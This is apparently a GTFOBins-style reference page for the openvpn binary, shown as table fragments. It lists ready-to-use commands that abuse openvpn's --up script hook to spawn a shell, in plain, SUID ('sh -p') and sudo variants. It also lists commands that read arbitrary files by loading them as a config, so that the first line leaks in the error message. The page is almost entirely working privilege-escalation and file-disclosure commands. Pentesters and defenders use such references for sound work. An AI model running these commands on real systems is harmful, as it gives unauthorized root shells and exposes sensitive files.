| code |
| openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
|
|
|
| description |
code |
| The file is actually parsed and the first partial wrong line is returned in an error message. |
LFILE=file_to_read
openvpn --config "$LFILE"
|
|
|
| code |
| ./openvpn --dev null --script-security 2 --up '/bin/sh -p -c "sh -p"'
|
|
| description |
code |
| The file is actually parsed and the first partial wrong line is returned in an error message. |
LFILE=file_to_read
./openvpn --config "$LFILE"
|
|
|
| code |
| sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
|
|
| description |
code |
| The file is actually parsed and the first partial wrong line is returned in an error message. |
LFILE=file_to_read
sudo openvpn --config "$LFILE"
|
|
|